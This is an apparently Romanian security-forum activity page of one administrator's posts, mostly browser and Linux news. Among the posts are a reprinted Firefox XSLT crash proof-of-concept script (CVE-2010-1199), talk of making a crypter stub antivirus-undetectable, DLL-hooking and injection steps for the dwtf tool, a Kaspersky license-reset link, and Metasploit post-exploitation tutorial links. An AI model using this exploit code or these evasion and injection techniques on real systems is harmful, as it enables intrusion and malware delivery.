Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18712

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro

    mozilla bug

    Nytro replied to gamer's topic in Off-topic

    Nu iti dau nici un ban pentru un bug. Poti scrie pe bugzilla despre el, sa il repare. Dau bani pentru probleme serioase de securitate, nu dau pentru orice mica prostioara.
  2. Nytro
    Momentan exista multa lene. Trebuie sa termin un articol mai intai, apoi ziceam ca fac ceva pentru Linux. Voiam sa fac Stealer pentru Linux, dar nu se incadreaza in etica mea.
  3. Nytro
    Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1 http://securitytube.net/Metasploit-Megaprimer-%28Exploitation-Basics-and-need-for-Metasploit%29-Part-1-video.aspx Metasploit Megaprimer (Getting Started with Metasploit) Part 2 http://securitytube.net/Metasploit-Megaprimer-%28Getting-Started-with-Metasploit%29-Part-2-video.aspx Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi) http://securitytube.net/Metasploit-Megaprimer-Part-3-%28Meterpreter-Basics-and-using-Stdapi%29-video.aspx Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv) http://securitytube.net/Metasploit-Megaprimer-Part-4-%28Meterpreter-Extensions-Stdapi-and-Priv%29-video.aspx Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito) http://securitytube.net/Metasploit-Megaprimer-Part-5-%28Understanding-Windows-Tokens-and-Meterpreter-Incognito%29-video.aspx Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts) http://securitytube.net/Metasploit-Megaprimer-Part-6-%28Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts%29-video.aspx Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation) http://securitytube.net/Metasploit-Megaprimer-Part-7-%28Metasploit-Database-Integration-and-Automating-Exploitation%29-video.aspx Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu) http://securitytube.net/Metasploit-Megaprimer-Part-8-%28Post-Exploitation-Kung-Fu%29-video.aspx Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation) http://securitytube.net/Metasploit-Megaprimer-Part-9-%28Post-Exploitation-Privilege-Escalation%29-video.aspx Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing) http://securitytube.net/Metasploit-Megaprimer-Part-10-%28Post-Exploitation-Log-Deletion-and-AV-Killing%29-video.aspx
  4. Nytro
    Nu e bun, e de 2 ani cred, il detecteaza majoritatea, cred ca 80%. Oricum, cred ca nu ar fi foarte greu de facut FUD, PE Loader-ul e intr-un ActiveX care nuc red ca e prea detectabil. Dar nu ma mai ocup momentan cu asa ceva.
  5. Nytro
    L-a postat cineva (dragon, thanks) pe ISR, nu stiu exact despre ce e vorba, am vazut doar ca se foloseste un stub al meu (de la Royal Crypter v1.0) . Screenshot: http://i54.tinypic.com/xfzx1x.png Download: http://www.multiupload.com/F07DE06966 Cum sa modifici un stub. Sa ne spuna mai multe cineva care stie assembly.
  6. Nytro
    The X-Frame-Options response header O masura de precautie impotriva ClickJacking-ului. Sursa: https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header Introduced in Gecko 1.9.2.9 (Firefox 3.6.9) The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. Using X-Frame-Options There are two possible values for X-Frame-Options: DENY The page cannot be displayed in a frame, regardless of the site attempting to do so. SAMEORIGIN The page can only be displayed in a frame on the same origin as the page itself. In other words, if you specify DENY, not only will attempts to load the page in a frame fail when loaded from other sites, attempts to do so will fail when loaded from the same site. On the other hand, if you specify SAMEORIGIN, you can still use the page in a frame as long as the site including it in a frame it is the same as the one serving the page. Results When an attempt is made to load content into a frame, and permission is denied by the X-Frame-Options header, Firefox currently renders about: blank into the frame. At some point, an error message of some kind will be displayed in the frame instead. Browser compatibility [B]Browser Lowest version[/B] Internet Explorer 8.0 Firefox (Gecko) 3.6.9 (1.9.2.9) Opera 10.50 Safari 4.0 Chrome 4.1.249.1042 De vazut, interesant: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx
  7. Nytro
    Vulnerabilitate 0-day in Adobe Reader – exploit semnat digital de Bogdan Condurache, 9 septembri O noua vulnerabilitate a fost descoperita in produsele Adobe Reader si Acrobat. Asa cum suntem instiintati de Roel, expert al Kaspersky Lab, aceasta vulnerabilitate este foarte exploatata. Unul din lucrurile care atrage atentia este tehnologia de programare ROP care ii permit sa treaca de protectia ASLR si DEP din Windows Vista si Seven. Majoritatea vulnerabilitatilor din fisierele PDF permit descarcarea de continut malitios. De aceasta data fisierul PDF contine codul malitios. Acesta creeaza un fisier executabil in directorul %temp% pe care va incerca sa il si execute. Ce este si mai interesant este ca fisierul este are semnatura digitala valida pana in 29 octombrie, a.c. Semnatura digitala apartine unei Cooperative de Credit din Statele Unite ale Americii si este semnat de VeriSign. Nu este prima data cand creatorii de malware se folosesc de semnaturile digitale furate pentru a semna exploit-uri. Sa ne amintim doar de Stuxnet. Sa speram ca stuxnet nu a insemnat “un nou trend” si ca semnarea digitala a malware-ului se va opri. Puteti inlocui adobe Reader cu PDF X-Change Viewer, Foxit PDF Reader sau Sumatra. Toate acestea fiind soft-uri gratuite, ultimul fiind open-source. Referinte: http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate Sursa: Vulnerabilitate 0-day in Adobe Reader - exploit semnat digital | WorldIT
  8. Nytro
    KASPERSKY PURE Kaspersky PURE este superior oricarei solutii obisnuite de protectie a PC-ului. Acest produs ofera imunitate PC-ului tau in fata amenintarilor cibernetice de orice fel. Kaspersky PURE protejeaza integritatea si confidentialitatea tuturor bunurilor tale digitale. Kaspersky PURE iti pastreaza PC-ul curat si iti ofera linistea de care ai nevoie. Trial: http://trial.bestantivirus.ro/home_user/0_kpure/kaspersky_pure.zip KASPERSKY INTERNET SECURITY 2011 Aceasta solutie oferita de Kaspersky Lab imbina protectia unui antivirus cu un paravan de protectie personal si cu un filtru anti-spam. Kaspersky Internet Security iti protejeaza PC-ul impotriva spamului, a programelor periculoase de tip adware, spyware, dialers, precum si impotriva atacurilor de retea. Trial: http://trial.bestantivirus.ro/home_user/1_kis_2011/kaspersky_internet_security_2011.zip KASPERSKY ANTI-VIRUS 2011 Kaspersky Anti-Virus, nucleul sistemului de securitate al PC-ului tau, asigura protectie impotriva unei game largi de amenintari informatice si iti pune la dispozitie instrumentele de baza necesare pentru protectia PC-ului tau. Trial: http://trial.bestantivirus.ro/home_user/2_kav_2011/kaspersky_anti-virus_2011.zip KASPERSKY ANTI-VIRUS FOR MAC Compatibil cu Mac OS 10.6 Snow Leopard! Kaspersky Anti-Virus for Mac ofera protectie avansata pentru Mac-ul tau avand o interfata familiara utilizatorilor acestui sistem de operare si folosind tehnologii Kaspersky Lab premiate si patentate. Trial: http://trial.bestantivirus.ro/home_user/5_kav_for_mac/kaspersky_anti-virus_for_mac.zip KASPERSKY MOBILE SECURITY 9 Initiezi apeluri, trimiti mesaje text, navighezi pe Internet si comunici prin intermediul retelelor sociale in fiecare zi. Smartphone-ul este o parte importanta din viata ta. Kaspersky Mobile Security iti pastreaza datele doar pentru tine. Trial: http://trial.bestantivirus.ro/home_user/6_kms_9/kaspersky_mobile_security_9.zip KASPERSKY PASSWORD MANAGER Kaspersky Password Manager este un utilitar indispensabil pentru utilizatorul activ de Internet. Automatizeaza complet procesul de introducere a parolelor si a altor date in site-urile web si va scapa de efortul de a crea si a tine minte mai multe parole. Trial: http://trial.bestantivirus.ro/home_user/8_kpm/kaspersky_password_manager.zip KASPERSKY KRYPTOSTORAGE Kaspersky KryptoStorage iti protejeaza securizat fisierele personale impotriva accesului neautorizat si furtului de date folosind o tehnologie de ultima generatie pentru criptare transparenta, permitand stergerea permanenta a fisierelor din computer. Trial: http://trial.bestantivirus.ro/home_user/7_kks/kaspersky_kryptostorage.zip Sau de preferat descarcati de aici: http://www.kaspersky.com/trials Si am mai gasit asta (nu am testat, nu stiu daca e infectat...): This is the FINAL version of KTR911, you can reset your Kaspersky 2011/ Kaspersky 2010/ Kaspersky PURE anytime you want, even if your Kaspersky license is still valid, then you’ll get a fresh new license from Kaspersky Lab. Download: http://hotfile.com/dl/68124248/d1a2334/KTR.9.11.rar.html Sau: http://uploading.com/files/13e485dc/KTR.9.11.rar/
  9. Nytro
    Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < Day 9 (Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-day9-ba.zip ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 ''' import sys; myStyle = """<?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:output method="html"/> <xsl:template match="/"> <html> <head> <title>Beatles</title> </head> <body> <table border="1"> <xsl:for-each select="beatles/beatle"> """ BlockCount = 43000 count = 1 while(count<BlockCount): myStyle = myStyle + "<xsl:sort select='name/abysssec"+str(count)+"' order='descending'/>\n" count = count + 1 myStyle = myStyle +""" <tr> <td><a href="{@link}"><xsl:value-of select="name/lastname"/></a></td> <td><a href="{@link}"><xsl:value-of select="name/firstname"/></a></td> </tr> </xsl:for-each> </table> </body> </html> </xsl:template> </xsl:stylesheet> """ cssFile = open("abysssec.xsl","w") cssFile.write(myStyle) cssFile.close() ''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability Version : Firefox 3.6.3 Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : High/Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-1199 MOAUB Number : MOAU_09_BA ''' import sys; myStyle = """<?xml version="1.0"?> <?xml-stylesheet href="abysssec.xsl" type="text/xsl"?> <beatles> """ block = """ <beatle link="http://www.johnlennon.com"> <name> """ BlockCount = 2147483647 rowCount=10 #myStyle = myStyle + "<tree id='mytree' flex='1' rows='"+str(rowCount)+"'>\n" count = 1 while(count<BlockCount): myStyle = myStyle + """ <beatle link="http://www.johnlennon.com"> <name> """ myStyle = myStyle + " <firstname>"+"A"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Lennon</lastname> </name> </beatle> <beatle link="http://www.paulmccartney.com"> <name>""" myStyle = myStyle + " <firstname>"+"B"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>McCartney</lastname> </name> </beatle> <beatle link="http://www.georgeharrison.com"> <name> """ myStyle = myStyle + " <firstname>"+"C"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Harrison</lastname> </name> </beatle> <beatle link="http://www.ringostarr.com"> <name> """ myStyle = myStyle + " <firstname>"+"D"*rowCount+"</firstname>\n" myStyle = myStyle + """ <lastname>Starr</lastname> </name> </beatle> <beatle link="http://www.webucator.com" real="no"> <name> """ myStyle = myStyle + " <firstname>"+"E"*rowCount+"</firstname>\n" myStyle = myStyle +""" <lastname>Dunn</lastname> </name> </beatle> """ count = count - 1 myStyle = myStyle +""" </beatles> """ cssFile = open("abyssssec.xml","w") cssFile.write(myStyle) cssFile.close() Sursa: MOAUB #9 - Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability In primul rand nu vad unde e Remote Code Execution. Poate DOS, asta da. Apoi .xsl-ul, nu mil-l deschide ci imi apare sa il descarc, probabil e necesar un Content-Type potrivit, dar nu ma chinui sa testez. Inca o chestie ciudata mi se pare ca nu imi omoara ambele procesoare (core-uri) simultan, ci "profita" de ele pe rand. Cand unul e la 100%, celalalt e la un nivel redus si invers. Imi place asta. Screenshot: http://i51.tinypic.com/23vzw60.png
  10. Nytro
    Firefox Updated E un video acolo. Exemplu, cu si fara hardware acceleration.
  11. Nytro
    Google Chrome vs. Firefox – care e mai tare în accelerare hardware? 08 septembrie 2010 | 15:05 Liviu Mihai Cel mai nou front de lupt? în r?zboiul browserelor este accelerarea hardware. Aceast? tehnologie, cum unii dintre voi cunoa?te?i deja, permite browser-ului s? foloseasc? puterea de procesare a pl?cii video, al?turi de procesorul sistemului. La ora actual?, browserele web abia încep s? ne arate poten?ialul acceler?rii hardware. Se fac teste ?i se experimenteaz?. Chrome ?i Firefox sunt browserele care suport? la acest moment accelerarea hardware, accelerare ce poate fi folosit? efectiv de utilizatori. Internet Explorer 9 promite ?i el o accelerare eficient? dar, deocamdat?, nu este disponibil pentru download. Din aceste considerente, putem testa accelerarea hardware doar în Chrome ?i Firefox. Trebuie s? ai Google Chrome 7 dev (sau Chromium) ?i s? activezi accelerarea hardware în acest fel. În cazul lui Firefox, trebuie s? ai instalat? versiunea lansat? ast?zi - beta 5 pentru versiunea 4, care poate fi desc?rcat de aici. În Firefox, accelerarea hardware este deja activat? în mod implicit. Testul Ironic, am testat poten?ialul acceler?rii hardware din Firefox ?i Google Chrome folosind testele create de Microsoft pentru a ne demonstra cât de bun este Internet Explorer 9. Cum IE9 nu este înc? disponibil, nici m?car beta, r?mâne pentru alt? dat? testarea lui. Test drive-ul creat de Microsoft poate fi accesat la aceast? adres?. Sunt disponibile trei categorii de teste: de vitez?, de HTML5 ?i de grafic?. Cum accelerarea hardware are ca scop cre?terea vitezei browser-ului, am ales un test de vitez?. Mai precis cel numit FishIE Tank. Rezultatele Testul a fost realizat cu ferestrele browserelor maximizate, cu 250 de pe?ti. Rezultatele au fost dup? cum urmeaz?: Firefox (rezolu?ie 1215 x 694 pixeli): în medie 40 FPS (frame-uri pe secund?) - aproximativ 27% gradul de înc?rcare al procesorului Chrome (rezolu?ie 1215 x 739 pixeli): în medie 5 FPS - aproximativ 50% gradul de înc?rcare al procesorului Se poate observa c? Firefox 4 beta 5, cu un grad de ocupare a procesorului la jum?tate fa?? de Google Chrome 7 dev, a ob?inut o performan?? de 8 ori mai bun? . De ?inut cont ?i de faptul c? rezolu?ia lui Google Chrome a fost pu?in mai mare (?ine de personalizarea interfe?ei). A?adar, Firefox reu?e?te s? redirec?ioneze mai eficient efortul de procesare c?tre placa video. Prin urmare, atât nivelul de înc?rcare al procesorului, cât ?i viteza de randare a fost mult superioar?. Cum am spus, ambele browser abia încep s? "se joace" cu accelerarea hardware. Nu este un test care s? eviden?ieze un rezultat clar. Este o situa?ie temporar?, care se poate schimba rapid. În plus, r?mâne de v?zut cum se vor comporta Internet Explorer 9 ?i Opera, când vor introduce aceast? facilitate. Pân? atunci, acest test scoate în eviden?? înc? un motiv, al?turi de altele, precum func?ia Panorama, pentru care Firefox 4 va reprezenta un upgrade important.
  12. Nytro
    Nu cred ca va fi mai mare. Browser-ul va fi acelasi, adica acelasi suport va trebui sa il ofere, pentru toate prostioarele din HTML5 de exemplu. Daca e nevoie de cod in plus, sa faca si ei un fel de modul, sa fie incarcat doar cand e necesar.
  13. Nytro
    Firefox 4 Set to Improve Security September 8, 2010 By Sean Michael Kerner The race to accelerate browser features continues as Mozilla developers race towards the finish line to get the finished version of the Firefox 4 Web browser out the door. The first Firefox 4 beta was released in early July of this year and the final release is due by the end of the year. Along the way to its final generally available release, Mozilla developers have been issuing milestone releases with new features and bug fixes. Firefox 4 development is occurring at a time when rival browser vendor Google (NASDAQ: GOOG) is updating it Chrome browser to version 6 and Microsoft is working on Internet Explorer 9. Firefox 4 Beta 5 is set to debut this week providing testers with new hardware accelerated graphics capabilities and an implementation of the IETF HTTP Strict Transport Security (HSTS) draft standard. "A while ago, we talked about Force-TLS that lets sites say 'hey, only access me over HTTPS in the future' and the browser listens," Mozilla developer Sid Stamm blogged. "Well, this idea has been solidified into a draft spec for HTTP Strict Transport Security (HSTS) and we’ve landed support for it into our source tree. This means that HSTS will be shipped with Firefox 4, and will be deployed as soon as the next beta release." The HSTS specification will enable site owners to ensure that browsers visit the SSL (define) secured version of a website instead of going through an unencrypted non-SSL HTTP address first. SSL secured sites help to ensure that password, login and other sensitive information is encrypted. "If Firefox knows your host is an HSTS one, it will automatically establish a secure connection to your server without even trying an insecure one," Stamm blogged. "This way, if I am surfing the 'net in my favorite cafe and a hacker is playing MITM with paypal.com (intercepting http requests for paypal.com and then forwarding them on to the real site), either I'll thwart the attacker by getting an encrypted connection to paypal.com immediately, or the attack will be detected by HSTS and the connection won't work at all." What will Firefox 4 Include – and leave out? While the Beta 5 release includes new features, the final feature freeze for Firefox 4 is likely coming soon. A number of features that were originally set for inclusion of Firefox 4 have already been dropped including a new Account Manager tool. On Mozilla's platform wiki, the open source organization has also noted in its latest meeting notes that new Windows silent updating feature may be at risk from being dropped from the final release. The silent update feature is one that is intended to run in the background and update the Firefox browser as new security releases come out. With Beta 5 out the door, Mozilla developers are turning their attention to Beta 6 which is currently scheduled for a code freeze on Friday September 10th. During a conference call on Tuesday, Mozilla's director of Firefox, Mike Beltzner noted that there are currently 114 blockers (items still to be fixed and/or completed) and as such he's not sure that the September 10th date for a Beta 6 code freeze will be achievable. "I would also like to avoid a repeat of landing particularly risky changes right before a code freeze, which is what happened with Beta 5," Beltzner said. "As a result, Beta 5 will ship with some drawing regressions, especially on Mac."
  14. Nytro
    Mozilla Labs Launches Gaming Initiative Sep 08, 2010 Platform based on open Web technologies. Mozilla Labs announced its newest initiative, a gaming platform appropriately named Mozilla Labs: Gaming. The goal of the platform is to create browser-based games built on Open Web standards. "We invite the wider community to play with cool, new tech and aim to help establish the Open Web as the platform for gaming across all your Internet connected devices," Pascal Finette from Mozilla Labs said. Some of the technologies Mozilla Labs Gaming utilizes include webGL, touch controls, geolocation, Javascript, and open video and audio. Games built on HTML5 are available freely on sites like HTML5games.com, but with Mozilla's new initiative looks to advance games. Mozilla Labs Gaming is also launching an international gaming competition to drive developer interest to the burgeoning platform. Aptly titled Game_On 2010, the competition will open at the end of September. (Trevan McGee)
  15. Nytro
    Sean Michael Kerner Wednesday, September 8, 2010 11:14:55 AM Recent years have seen the Ubuntu Linux distribution, led by Canonical, experiencing rapid growth in both users and features. With the upcoming Ubuntu 10.10 Maverick Meerkat release, set for October, Ubuntu developers will continue to push the boundaries further of both server and desktop Linux. Sitting at the upper rung of Ubuntu's engineering efforts is Matt Zimmerman, Canonical's CTO, who helps to lead Ubuntu's technical direction. That's no small feat: Keeping the project and its developers organized is a mammoth undertaking, requiring the daily coordination of activities across the globe. But as Zimmerman describes it, he has the tools and processes in place to keep the Ubuntu project running strong. One way that Zimmerman keeps the project on track is ensuring close communication among members of his team, a disparate organization that mirrors how the Ubuntu community itself builds and develops its Linux distribution. For one thing, While Canonical has offices in multiple countries, most of Zimmerman's engineers aren't located in those offices. "My team is about 120 people and I think we have less five people who are in offices," Zimmerman told InternetNews.com. While Zimmerman noted that he does get together face-to-face fairly regularly with his staff once a quarter, facilitating regular interaction requires a long list of common tools. For instance, Zimmerman said that Canonical engineers do a lot of work through IRC , wikis and teleconferences. The team also uses the open source Gobby tool for collaborative editing and Mumble for voice chatrooms. "Mumble is sort of like IRC for voice," Zimmerman said. "You have a set of channels and then people come and go from one channel to another and whatever channel you're in, there is live voice between the people that are in the room." Engineering organizations are often big users of whiteboards to build and share ideas, and Ubuntu is no exception. While his staff and contributors are distributed, Zimmerman said that they do rely on some desktop and screen-sharing, though he added that there isn't a one-to-one whiteboard substitute. For overall project and goal management, Canonical is using its own Launchpad platform. "Launchpad provides some basic project management support," Zimmerman said. "We've developed other tools around that for tracking." Zimmerman described the project's overall management as using a blueprint -- a project plan on which individual tasks are broken out. Canonical also has a tool that extracts data out of Launchpad and does reporting. One of the key reporting elements used by Zimmerman is a burn-down chart, an important element of the Scrum agile software development methodology. "It's basically a bar chart that shows you how much work you have remaining to do in your iteration," Zimmerman said. "So if you start off with, say, 200 tasks, you then draw it down to zero and you track it as you go if you're above or below the trend line." Though Zimmerman is using a Scrum-style burn-down chart to track project progress, he added that he isn't strictly adhering to any one particular development methodology. "We're using bits and pieces of different methodologies," Zimmerman said. "We use some components from Extreme Programming (XP), Scrum, and others. Different engineering teams have different requirements so we're experimenting with different approaches." From an accounting perspective, however, Zimmerman noted that by using elements of the Scrum approach, he is able to report on the output capacity of his team. "So we know in this amount of time how much we are able to get done and that enables more accurate forecasting," Zimmerman said. From a testing perspective, the Ubuntu engineering organization has multiple efforts underway. Zimmerman explained that hardware certification testing occurs in a hardware lab where daily, automated compatibility testing occurs. There are also automated functional tests to ensure that users can upgrade cleanly from one release to another. Then there is also manual testing, which is crowdsourced by the Ubuntu community. Ubuntu developers don't operate in a vacuum and are part of the broader upstream open source ecosystem. As a result, patches and contributions are made upstream by Zimmerman's team in an ongoing process. Sometimes, Ubuntu will have patches that have not yet been merged upstream. "We do carry patches on top of upstream, but we have to in order to meet our deadlines," Zimmerman said. "Our goal is to keep the delta as small as we can. Every release cycle, we spend a good amount of our engineering time bringing our patch set forward." Ubuntu also relies heavily on its relationship with the Debian Linux distribution, and Zimmerman noted that the vast majority of Ubuntu patches submitted to Debian are accepted. He added that with other upstream projects, where Ubuntu doesn't do as much work, there can be challenges. "It's tough since we have to work across so many different projects with Ubuntu," Zimmerman said. "We can't have a close personal relationship with everyone in the open source community, but at the same time, we've got to be able to work together."
  16. Nytro
    Inca un ban. Multi ratati pe aici. Un fisier se inchidea imediat dupa rulare, ascundea fisierele ascunse, bloca task manager. Nu am stat sa verific mai multe.
  17. Nytro

    Pax are fani ! :>

    Nytro replied to CODEX's topic in Off-topic

    Greerasu nu poate veni, nu e in Romania. Da-mi ID-ul tau pe MP.
  18. Nytro

    Pax are fani ! :>

    Nytro replied to CODEX's topic in Off-topic

    Lasati complimentele. Deci, cine e din VL si da de baut?
  19. Nytro
    Nu ruleaza pe masina virtuala, se inchide imediat la rulare, deci ban
  20. Nytro
    Mi-a venit si mie update-ul pentru asta de la OpenSUSE. Avantajul open-source-ingului... Si mi-au venit mai multe update-uri de securitate pentru kernel, faceti update.
  21. Nytro
    E de la rewrite 1337 e ID-ul acelui topic.
  22. Nytro

    Pax are fani ! :>

    Nytro replied to CODEX's topic in Off-topic

    Dai de baut? 2-3 beri acolo.
  23. Nytro
    dwtf v1.0 and its Features dwtf creates a fake.dll from real.dll Features: 1- It exports all symbols of real.dll (also Forwarder). 2- It imports all exports of real.dll (also Forwarder). 3- It creates an area code with a JMP DWORD [ADDRESS] for each export. 4- The exports of fake dll is assigned to a JMP area which jumps to original export of real.dll. Working of dwtf v1.0 If you are making PEB HOOKING, when the APP calls to fake dll export it jumps to original export, everything works fine: Before PEB HOOKING: APP -> IAT OF APP -> REAL DLL EXPORT After PEB HOOKING: APP -> IAT OF APP -> FAKE DLL EXPORT -> IAT OF FAKE DLL -> REAL DLL EXPORT You can add or remove payloads with any IAT HOOKING in the IAT of the fake dll: APP -> IAT OF APP -> FAKE DLL EXPORT -> IAT OF FAKE DLL -> PAYLOAD STACK -> (or never) REAL DLL EXPORT Syntax: dwtf.exe fake_dll real_dll Example: dwtf.exe k32.dll c:\windows\system32\kernel32.dll All .exes are in bin folder: You can execute the: Generate fake kernel32.bat This bat executes dwtf creating a fake kernel32.dll called k32.dll from c:\windows\system32\kernel32.dll After, you can make a pebhooking executing: PEB hooking poc with fake kernel32.bat IMPORTANT: You need the NETCAT for send commands to the console: This bat inject a console.dll in the poc.exe process using InjectorDll.exe This console listen by default in 127.0.0.1 1234, This console is the interface to do PEB Hooking: Next, the bat connect to 127.0.0.1 1234 using nc command (netcat) In the console with netcat you can write: pebhook kernel32.dll k32.dll resume exit In this moment poc.exe is running and it is waiting a user enter: poc.exe try creates files with two APIs of kernel32.dll: CreateFileW and CreateFileA When you press enter all works fine (good lucky) and the process exits creating files. In this scenario all works by this way: poc.exe -> IAT of POC.EXE -> k32.dll (fake kernel32.dll) -> IAT of k32.dll -> kernel32.dll Loading payloads dynamically: For this scenario: poc.exe -> IAT of POC.EXE -> k32.dll (fake kernel32.dll) -> IAT of k32.dll -> payload/s Remember: You can add a payload stack with IAT HOOKING over IAT HOOKING ... The payloads can calls to original kernel32.dll export. You need: Generate fake kernel32.bat PEB hooking poc with fake kernel32.bat command: pebhook kernel32.dll k32.dll Add a payload for CreateFileW, inserting a iat hook in k32.dll: Inject the dll: InjectorDll.exe poc_dll.dll -p PID_OF_POC_EXE In the POC.EXE you can see: Creating files... press enter DLL INJECTED! ADDR OF OwnCreateFileA: 0x70651030 < --- For EXAMPLE It is the time of IAT hooking of CreateFileA of k32.dll to OwnCreateFileA of poc_dll.dll Example of searching CreateFileA IAT ADDR in k32: Using peview (google: download peview): Search the oridinal of CreateFileA like this image: Search IAT ADDR in k32 of CreateFileA like this image: In the IMAGE the IAT ADDR is: 0x1000C1A6 Change the IAT to payload addr: write_process_memory.exe PID_OF_POC_EXE 0x1000C1A6 0x70651030 0x70651030 is the addr of OwnCreateFileA of poc_dll.dll injected in POC.exe In the console with netcat you can write: resume exit Credits dwtf 1.0 (MIT License) engine by Dreg, from evil fingers: - making FULL dll (PEB/file) hooking more easy... - Greetz: Lacon 2k9 Spain & Hispasec team. - Note: Use with real DLLs, a lot of bugs in this version contact me: dreg@fr33project.org Video: http://www.youtube.com/watch?v=t7UXEJieliM Download: http://rootkitanalytics.com/downloadCounter.php?id=7
  24. Nytro
    SpyDLLRemover v3 SpyDLLRemover is the standalone tool to effectively detect and delete spywares from the system. It comes with advanced spyware scanner which quickly discovers hidden Rootkit processes as well suspcious/injected DLLs within all running processes. It not only performs sophisticated auto analysis on process DLLs but also displays them with various threatlevels, which greatly helps in quick identification of malicious DLLs. The DLL search feature helps in finding DLL within all running processes using just partial or full name. Then user can choose to remove the dll from single process or from all loaded processes with just one click. One of the unique feature of SpyDLLRemover is its capability to free the DLL from remote process using advanced DLL injection method which can defeat any existing Rootkit tricks. It also uses sophisticated low level anti-rootkit techniques to uncover hidden userland Rootkit processes as well as to terminate them. SpyDLLRemover comes with support for Microsoft's latest operating system, Windows 7. Apart from this, it introduces new 'Scan Settings' option to allow the user to fine tune the scanning operation. Also it features improved heurestic analysis, enriched user interface, Intelli-Refresh of 'Process Viewer' and more. Current version provides support for malicious DLL removal from system processes across session boundaries breaking the limitations imposed in Vista/Win7. Features of SpyDLLRemover v3 Here are some of the prominent and unique features of SpyDLLRemover which set it apart from any other tool of its kind. * Advanced Spyware Scanner which efficiently discovers hidden Rootkit processes as well as suspicious/injected DLLs within all running processes in the system. * Detection and removal of hidden userland Rootkit processes using sophisticated techniques such as - Direct NT System Call Implementation - Process ID Bruteforce Method (PIDB) as first used by BlackLight - CSRSS Process Handle Enumeration Method * State of art technique for completely freeing the injected DLL from remote process based on advanced DLL injection method using low level implementation which defeats any blocking attempts by Rootkits. This is one of those unique features found only in SpyDLLRemover. * Sophisticated DLL auto analysis which helps in seperating out the legitimate modules/DLLs from the malicious ones. Such DLLs are displayed using different colors representing various threat levels for quicker and easier identification. * 'Scan Settings' option to fine tune the scanning operation based on user needs. * Inteli-Refresh of 'Process Viewer' leading to flicker free user experience. * Integrated online verification mechanism through ProcessLibrary.com to validate any suspcious DLLs. This makes it easy to differentiate between the spyware & legitimate DLLs. * DLL Tracer feature to search for dll within the running processes using partial or full name. Then user can choose to remove the dll from single process or from all loaded processes with just one click. * Sort the process/DLL in the list based on various parameters for easier and quicker analysis. * Detailed report generation of Spyware scanning result as well as process/DLL list in standard HTML format for offline investigation. * View the process/DLL properties for more information by just double clicking on the process/DLL entry in the list. * Feature to show all running processes in the system which has loaded the selected DLL. Also user can click on "Remove DLL from ALL' button to quickly remove any such malicious DLL from all loaded processes. * Termination of suspicious or hidden process based on low level implementation which makes it very effective against any Rootkit techniques. * Support for malicious DLL removal from system processes across session boundaries breaking the limitations imposed in Vista/Win7. * Displays detailed information about all running processes on the system - Process name - Process Id - Session Id - Company Name - Product Name - Process Description - Memory Utilization - Process Binary Path - Process File Size - File Install Date * Shows detailed information about each loaded DLLs within process to make it easier for manual analysis. - DLL Name - Company Name - Description - Comment about type of DLL (System, Hidden, Suspicious) - Load/reference count of DLL - Loading Type (static/dynamic) - DLL File Size - File Install Date - Base Address of DLL - Entry point of DLL - Full DLL File Path * It is standalone tool which does not require any installation and can be executed directly. * Enriched user interface along with more user friendly options makes it the cool tool. Download: http://rootkitanalytics.com/downloadCounter.php?id=6
  25. Nytro

    Pax are fani ! :>

    Nytro replied to CODEX's topic in Off-topic

    A, credeam ca esti tu. Ca tu esti singurul din VL de aici pe care il stiu. Daca dai o bere, doua vin Oricum, cred ca avem prieteni comuni, cred ca am vazut poze cu tine pe facebook-urile unor amici, nu mai stiu.
×
×
  • Create New...